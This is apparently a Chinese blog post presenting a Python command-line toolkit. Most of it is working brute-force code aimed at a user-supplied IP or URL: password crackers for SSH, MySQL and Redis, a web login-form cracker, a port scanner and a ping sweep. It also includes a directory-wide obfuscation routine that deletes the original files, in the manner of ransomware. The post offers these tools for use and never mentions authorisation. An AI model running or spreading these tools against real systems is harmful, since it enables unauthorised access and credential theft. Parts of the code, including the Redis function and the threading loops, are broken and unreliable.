python制作命令行工具集

最新推荐文章于 2025-05-05 14:26:08 发布
原创 最新推荐文章于 2025-05-05 14:26:08 发布 · 424 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #网络安全

该Python脚本创建了一个命令行工具,包含SSH、MySQL、Redis服务的已知和未知用户爆破功能,支持多线程。同时,它还实现了HTML表单的用户名和密码爆破、文件的加密解密以及端口和IP的嗅探功能。

借助pythpn完成一个命令行工具集

  • 基础

import base64
import os
import threading
import time
import click
import paramiko
import pymysql
import redis
import requests
import socket
@click.group()  #子选项制作
def cli():
    pass

  • 已知用户爆破ssh

@click.command()
@click.option('-u', default='root', help='输入你想尝试的用户名')
@click.option('-p', default=22, help='输入你想尝试的端口')
@click.option('-i', prompt='请输入IP', help='输入你想尝试的IP')
@click.option('-t', prompt='请输入路径', help='输入字典路径', type=str)
def ssh_ran_user(u, p, i, t):   #已知用户进行爆破ssh
    print('正在运行')
    with open(t, 'r') as fp:
        password = fp.readlines()
    for passw in password:
        passw = passw.strip()
        try:
            transport = paramiko.Transport((i, p))
            transport.connect(username=u, password=passw)  # 进行遍历尝试连接
        except:
            pass
        else:
            print(f'登录成功', '登录密码是', passw)
            break

  • 未知用户爆破ssh

@click.command()
@click.option('-u', prompt='请输入路径', help='输入你想尝试的用户名字典路径', type=str)
@click.option('-p', default=22, help='输入你想尝试的端口')
@click.option('-i', prompt='请输入IP', help='输入你想尝试的IP')
@click.option('-t', prompt='请输入路径', help='输入字典路径', type=str)
@click.option('--thread', default='0', help='是否开启多线程,0不启动,1开启', type=click.Choice(['0', '1']))
def ssh_ran(u, p, i, t, thread):  #未知用户进行爆破ssh
    if thread == '0':
        print('正在运行')
        with open(t, 'r') as fp:
            password = fp.readlines()
        with open(u, 'r') as fp:
            username = fp.readlines()
        for user in username:
            user = user.strip()
            for passw in password:
                passw = passw.strip()
                time.sleep(0.2)
                try:
                    transport = paramiko.Transport((i, p))
                    transport.connect(username=user, password=passw)  # 进行遍历尝试连接
                except:
                    print(user, '和', passw)
                else:
                    print('登录成功', '用户名是', user, '登录密码是', passw)
                    return
    else:
        print('多线程运行')
        the = []
        with open(t, 'r') as fp:
            password = fp.readlines()
        with open(u, 'r') as fp:
            username = fp.readlines()
        for user in range(0, len(username), 10):
            use = username[user:user + 10]
            th = threading.Thread(target=ssh_ran_thr, args=(p, i, password, use,))
            the.append(th)
            for t in the:
                t.start()
                t.join()
def ssh_ran_thr(p, i, t, use):  #多线程调用
    for us in use:
        us = us.strip()
        for passw in t:
            try:
                transport = paramiko.Transport((i, p))
                te = transport.connect(username=us, password=passw)  # 进行遍历尝试连接
                print(te)
            except:
                print(us, '和', passw)
            else:
                print(f'登录成功:用户名{us},密码{passw}')
                exit()

  • 已知爆破mysql

@click.command()
@click.option('-u', default='root', help='输入你想尝试的用户名')
@click.option('-p', default=3306, help='输入你想尝试的端口')
@click.option('-i', prompt='请输入IP', help='输入你想尝试的IP')
@click.option('-d', prompt='请输入库名', help='输入库', type=str)
@click.option('-t', prompt='请输入路径', help='输入字典路径', type=str)
@click.option('-c', default='utf8mb4', help='编码方式')
def mysql_ran_user(u, p, i, d, t, c):   #已知用户进行爆破mysql
    with open(t, 'r') as fp:
        password = fp.readlines()
    for passw in password:
        passw = passw.strip()
        try:
            pymysql.connect(host=i, user=u, password=passw, port=p, database=d,
charset=c)
        except:
            print(u, passw)
        else:
            print('登录成功', '用户名', u, '登录密码', passw)
            break

  • 未知用户爆破mysql

@click.command()
@click.option('-u', prompt='请输入路径', help='输入你想尝试的用户名字典路径', type=str)
@click.option('-p', default=3306, help='输入你想尝试的端口')
@click.option('-i', prompt='请输入IP', help='输入你想尝试的IP')
@click.option('-d', prompt='请输入库名', help='输入库', type=str)
@click.option('-t', prompt='请输入路径', help='输入字典路径', type=str)
@click.option('-c', default='utf8mb4', help='编码方式')
@click.option('--thread', default='0', help='是否开启多线程,0不启动,1开启', type=click.Choice(['0', '1']))
def mysql_ran(u, p, i, d, t, c, thread):  #未知用户进行爆破mysql
    if thread == '0':
        with open(u, 'r') as fp:
            username = fp.readlines()
        with open(t, 'r') as fp:
            password = fp.readlines()
        for user in username:
            user = user.strip()
            for passw in password:
                passw = passw.strip()
                try:
                    pymysql.connect(host=i, user=user, password=passw, port=p, database=d,
                                    charset=c)
                except:
                    print(user, passw)
                else:
                    print('登录成功', '用户名', user, '登录密码', passw)
                    exit()
    else:
        print('多线程运行')
        the = []
        with open(t, 'r') as fp:
            password = fp.readlines()
        with open(u, 'r') as fp:
            username = fp.readlines()
        for user in range(0, len(username), 10):
            use = username[user:user + 10]
            th = threading.Thread(target=mysql_ran_thr, args=(p, i, d, c, password, use,))
            the.append(th)
            for t in the:
                t.start()
                t.join()
                time.sleep(5)
def mysql_ran_thr(p, i, d, c, password, use):  #多线程调用
    for user in use:
        user = user.strip()
        for passw in password:
            passw = passw.strip()
            try:
                pymysql.connect(host=i, user=user, password=passw, port=p, database=d,
                                charset=c)
            except:
                print(user, passw)
            else:
                print('登录成功', '用户名', user, '登录密码', passw)
                exit()

  • redis爆破

@click.command()
@click.option('-p', default=6379, help='输入你想尝试的端口')
@click.option('-i', prompt='请输入IP', help='输入你想尝试的IP')
@click.option('-d', default=0, help='输入库')
@click.option('-t', prompt='请输入路径', help='输入字典路径', type=str)
def redis_ran_user(p, i, d, t):    #redis爆破    with open(t, 'r') as fp:
        password = fp.readlines()
for passw in password:
    try:
            passw = passw.strip()
            redis.Redis(host=i, port=p, db=d, password=passw)
except:
    pass        
else:
    print('登录成功', '登录密码', passw)
break

  • html用户名密码爆破

@click.command()
@click.option('-u', prompt='请输入路径', help='输入你想尝试的用户名字典路径', type=str)
@click.option('-l', prompt='请输入路径', help='输入url路径', type=str)
@click.option('-t', prompt='请输入路径', help='输入字典路径', type=str)
@click.option('-v', default='0000', help='验证码')
@click.option('--thread', default='0', help='是否开启多线程,0不启动,1开启', type=click.Choice(['0', '1']))
def html_ran(u, l, t, v, thread):   #网页爆破,用户名和密码未知
    if thread == '0':
        print('正在启动')
        with open(u, 'r') as fp:
            username = fp.readlines()
        with open(t, 'r') as fp:
            password = fp.readlines()
        for user in username:
            use = user.strip()
            for passwor in password:
                pa = passwor.strip()
                data = {"user": use, "pass": pa, "vcode": v}  # 通过用户名和密码尝试登录
                res = requests.post(url=l, data=data)
                if res.text == "location.href='../book/cheng.php'":
                    print('登录成功', '用户名是', use, '密码是', pa)
                    exit()
    else:
        print('多线程运行')
        the = []
        with open(t, 'r') as fp:
            password = fp.readlines()
        with open(u, 'r') as fp:
            username = fp.readlines()
        for user in range(0, len(username), 10):
            use = username[user:user + 10]
            th = threading.Thread(target=html_ran_thr, args=(l, v, password, use,))
            the.append(th)
            for t in the:
                t.start()
                t.join()
                time.sleep(5)
def html_ran_thr(l, v, password, use):  #调用多线程
    for user in use:
        us = user.strip()
        for passwor in password:
            pa = passwor.strip()
            data = {"user": us, "pass": pa, "vcode": v}  # 通过用户名和密码尝试登录
            res = requests.post(url=l, data=data)
            if res.text == "location.href='../book/cheng.php'":
                print('登录成功', '用户名是', us, '密码是', pa)
                exit()

  • 加密解密

@click.command()
@click.option('-p', prompt='d或者e', help='进行加密或者解密', type=click.Choice(['d', 'e']))
@click.option('--path', help='输入文件路径', type=str)
@click.option('--src', help='输入目录路径', type=str)
def de_en(p, path, src):   #根据情况进行划分
    res = []
    if src is not None:
        for root, dirs, files in os.walk(src):  # 获取父目录,子目录,文件
            for file in files:
                res.append(os.path.join(root, file))  # 把父目录和文件合成一个路径
        # print(res)
    else:
        res.append(path)
    if p == 'e':   #加密解密划分
        for r in res:
            with open(r, 'rb') as fp:
                src = fp.read()
            bs = base64.b64encode(src).decode()
            se = ''
            for b in bs:
                new = chr(ord(b) + 5)
                se += new
            os.remove(r)
            name = '123'
            with open(r + name, 'wb') as fp:
                fp.write(se.encode())
        print('加密完成')
    else:
        for r in res:
            with open(r, 'r') as fp:
                src = fp.read()
            se = ''
            for b in src:
                new = chr(ord(b) - 5)
                se += new
            resp = base64.b64decode(se)
            s = r[0:-3]
            os.remove(r)
            with open(s, 'wb') as fp:
                fp.write(resp)
        print('解密完成')

  • 端口嗅探

@click.command()
@click.option('-i', help='输入你想尝试的端口', type=int)
@click.option('-u', prompt='请输入IP', help='输入你想尝试的IP')
def scan_port(i, u):
    lis = []
    if i is None:
        lis = [7, 21, 22, 23, 25, 43, 53, 67, 68, 69, 79, 80, 81, 88, 109, 110, 113, 119, 123, 135, 137, 138, 139,
143, 161, 162, 179, 194, 220, 389, 443, 445, 465, 513, 520, 546, 547, 554, 563, 631, 636, 991, 993,
995, 1080, 1194, 1433, 1434, 1494, 1521, 1701, 1723, 1755, 1812, 1813, 1863, 3269, 3306, 3307, 3389,
3544,
4369, 5060, 5061, 5355, 5432, 5671, 5672, 6379, 7001, 8080, 8081, 8082, 8088, 8443, 8883, 8888, 9443,
9988, 15672, 27017, 50389, 50636, 61613, 61614]
    else:
        lis.append(i)
    for i in lis:
        threading.Thread(target=scan_p, args=(i, u,)).start()
    exit()
def scan_p(i, u):
    try:
        sock = socket.socket()
        sock.connect((u, i))
    except:
        pass
    else:
        print('可用端口:', i)

  • IP嗅探

@click.command()
@click.option('-s', default='w', help='输入使用系统', type=click.Choice(['w', 'l']))
@click.option('-u', prompt='请输入IP', help='输入你想尝试的IP', type=str)
def scan_ip(s, u):   #根据启动的系统不同自己选则
    print('启动')
    for i in range(1, 256):
        threading.Thread(target=scan_i, args=(i, s, u,)).start()
def scan_i(i, s, u):
    if s == 'w':
        i = str(i)
        v = u.split('.')
        v.pop()
        v.append(i)
        s = '.'.join(v)
        ip = s
        cmd = f"ping -w 1 -n 2 {ip}"
        res = os.popen(cmd).read()
        if '字节=32' in res:
            print('存在IP', ip)
    else:
        i = str(i)
        v = u.split('.')
        v.pop()
        v.append(i)
        u = '.'.join(v)
        ip = u
        cmd = f"ping -c 2 -W 1 {ip}"
        res = os.popen(cmd).read()
        if '64 bytes' in res:
            print('存在IP', ip)

  • 收尾

cli.add_command(ssh_ran_user)
cli.add_command(ssh_ran)
cli.add_command(mysql_ran_user)
cli.add_command(mysql_ran)
cli.add_command(redis_ran_user)
cli.add_command(html_ran)
cli.add_command(de_en)
cli.add_command(scan_port)
cli.add_command(scan_ip)
if __name__ == '__main__':
    cli()

gg_Go_game
关注
Python教程:一文了解如何让Python代码变成命令行工具
旦莫的博客
07-19 2438
在构建命令行工具时,解析传入的命令行参数是一个非常重要的环节。Python的 argparse 库就是为此目的而设计的,它可以轻松地处理命令行参数并生成帮助和使用信息。本文将深入剖析 argparse 库的使用方法,并通过多个具体的示例来展示其强大功能。
Python 命令行工具开发入门
学无止境
01-28 334
输出文件内容到标准输出显示 Python 版本号显示帮助信息通过这个简单的例子,我们学习了如何使用 Python 编写一个基本的命令行工具。根据实际需求,我们可以进一步扩展功能,使其更加强大和实用。希望这篇文章对你在命令行工具的开发过程中有所帮助。
Python-pythonterminalmenucli一个快速创建命令行菜单的工具
08-10
python terminal menu cli 一个快速创建命令行菜单的工具
懒人必备神器 ,一个创意十足的 Python 命令行工具
大模型教程的博客
01-12 638
当听到某些人说 xx 库非常好用的时候,我们总是忍不住想要去亲自试试。 有一些库,之所以好用,是对一些库做了更高级的封闭,你装了这个库,就会附带装了 n 多依赖库,就前一篇文章介绍的 streamlit 来说,依赖包就达 90 几个之多? 比百度全家桶,还 tm 的全家桶啊… 也正是因为害怕会污染我的全局 Python 环境,我通常在试用新包的时候,都会使用 venv 创建虚拟环境,再去安装,完事之后,再清理虚拟环境即可。 有没有发现,整个流程,其实还是挺麻烦的。 刚好昨天晚上,Github 上瞎
Python知识点:如何使用Python开发命令行工具
杰哥在此的专栏
09-08 1632
使用 Python 开发命令行工具是一个非常实用的技能,能够简化日常工作流程并自动化常见任务。选择合适的库argparse适合简单工具,click则更加灵活。命令行参数解析:通过定义位置参数和可选参数,让用户可以方便地提供输入。提供帮助和文档:确保工具有完善的帮助信息,通过--help命令展示。打包工具:通过setuptools打包工具,使其可供他人使用。通过这些步骤,你可以轻松开发和发布自己的命令行工具,提高工作效率。
Python命令行工具集:日常实用程序合集
python-utils”是一个基于Python语言开发的命令行实用程序集合,旨在为开发者和...对于希望提升自身效率、掌握自动化技能的开发者而言,此类项目不仅是实用工具集,更是学习Python编程、理解系统管理逻辑的绝佳范例。
Python-smi2ass是一个命令行工具可将SAMIsmi转成SSAASSass
08-10
Python-smi2ass是一个专为转换字幕格式而设计的命令行工具,它能够将SAMI(Synchronized Accessible Media Interchange)格式的字幕文件转换为SSA(SubStation Alpha)或ASS(Advanced SubStation Alpha)格式。...
Python命令行工具:转换和分析MIDI文件
资源摘要信息:"MIDI文件工具是一系列用于处理MIDI文件的命令行工具集,这些工具要求使用Python 3编程语言编写。其中的脚本可以帮助用户将MIDI文件从ezDrummer格式转换为Yamaha DTX格式,展示了其在音乐制作和格式...
精选资源
python-password-generator:用python制作的简单命令行密码生成器
02-10
在这个项目"python-password-generator"中,我们看到的是一个利用Python编写的简单命令行工具,它能够生成安全的随机密码,帮助用户创建复杂的密码以提高账户安全性。 在Python中,生成随机密码通常涉及到以下几个...
自动化工具_Python_Fire_命令行接口生成_1741399065.zip
03-10
这份资源对于那些希望提高Python编程效率、学习制作命令行工具的开发者来说,是一个非常有价值的教程。通过学习这份资源,开发者不仅能够掌握Fire库的使用,还能够通过实践案例加深对库的理解和应用能力,从而提升...
Python-termgraphpy一个python命令行工具用于在终端中绘制基本图表
08-10
termgraph.py 一个python命令行工具,用于在终端中绘制基本图表
如何用python写一个命令行工具
柿子树
12-09 2406
这个问题由两个步骤组成 一,在自己的Python脚本中,指定脚本的执行器: #!/usr/bin/env python3 这行代码表示,执行当前脚本时,去系统环境变量中找“python3”,然后根据环境变量找到真正的可执行程序 不加这行,我们执行一个Python的方式是: python myPython.py 加上之后可以这样执行: ./myPython.py 中间可能会提示权限受阻,我们可以给文件添加执行权限 chmod a+x myPython.py 如果希望更简洁的话,我们可以去掉
python 命令行工具_3个Python命令行工具
cumo7370的博客
07-02 893
python 命令行工具 有时,适合该工作的正确工具命令行应用程序。 命令行应用程序是一个程序,您可以与之交互或从诸如Shell或Terminal之类的程序中运行。 Git和Curl是您可能已经熟悉的命令行应用程序示例。 当您有一些代码想要连续或定期运行几次时,命令行应用程序将非常有用。 Django开发人员运行./manage.py runserver类的命令来启动他们的Web服务器。 ...
C# Action 和 Func 委托
11-30 447
Action 和 Func 委托 的区别 Action 没有返回值,Func 有返回值,通常是最后一个参数 简单使用Action 和 Func //不带参数 Action huaweiAction = new Action(Huawei); huaweiAction(); void Huawei() { Console.WriteLine($...
python 打造命令行工具(CI)
zhaofeiyue1234的博客
03-02 701
click + setuptools click官方文档 Python Click 学习笔记(转) 带你了解3个Python命令行工具 如何发布一个Python命令行工具
Python打造自己的专属命令行工具
最新发布
dudly的博客
05-05 2484
日常使用 Python 脚本时,频繁输入python script_name.py启动程序较为繁琐。本文围绕将 Python 脚本转化为 “真正” 的命令行命令展开,考虑到类 Unix(Linux、macOS)与 Windows 系统的差异,以创建能统计文本文件行数、功能类似wc -l的自定义命令count_lines为例,展示将 Python 脚本变为高效命令行工具的过程,帮助开发者提升脚本使用效率,挖掘 Python命令行工具开发中的潜力。
python3命令需要使用命令行开发者工具_PyTips 0x06 - Python 开发命令行工具
weixin_39791349的博客
11-29 955
Python 作为一种脚本语言,可以非常方便地用于系统(尤其是*nix系统)命令行工具的开发。Python 自身也集成了一些标准库,专门用于处理命令行相关的问题。命令行工具的一般结构:1. 标准输入输出*nix 系统中,一切皆为文件,因此标准输入、输出可以完全可以看做是对文件的操作。标准化输入可以通过管道(pipe)或重定向(redirect)的方式传递:# script reverse.py#!...
python制作命令行工具——fire
pythonputao的博客
12-15 589
一、快速介绍 来一波官方介绍。 Python Fire是一个库,用于从任何Python对象自动生成命令行接口。 是用python创建CLI的一种简单方法。 是开发和调试Python代码的一个有用工具Python Fire帮助探索现有代码或将其他人的代码转换为CLI。 使得Bash和Python之间的转换更加容易。 通过使用已经导入和创建的模块和变量来设置REPL, Python Fire使使用Python REPL变得更容易。 没听懂 ??? 不是太明白 ??? 不要紧,看完本篇就懂了
Python 自动化运维 —— 命令行工具
weixin_34050519的博客
05-15 263
1. click 模块 click 模块和argparse功能相同,但更为易用,使用click分为两个步骤 :1) 使用@click.command()装饰一个函数,使之成为命令行接口;2) 使用@click.option()等装饰函数,为其添加命令行选项等。 import click @click.command() @click.option('--count',defalut=1,help=...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值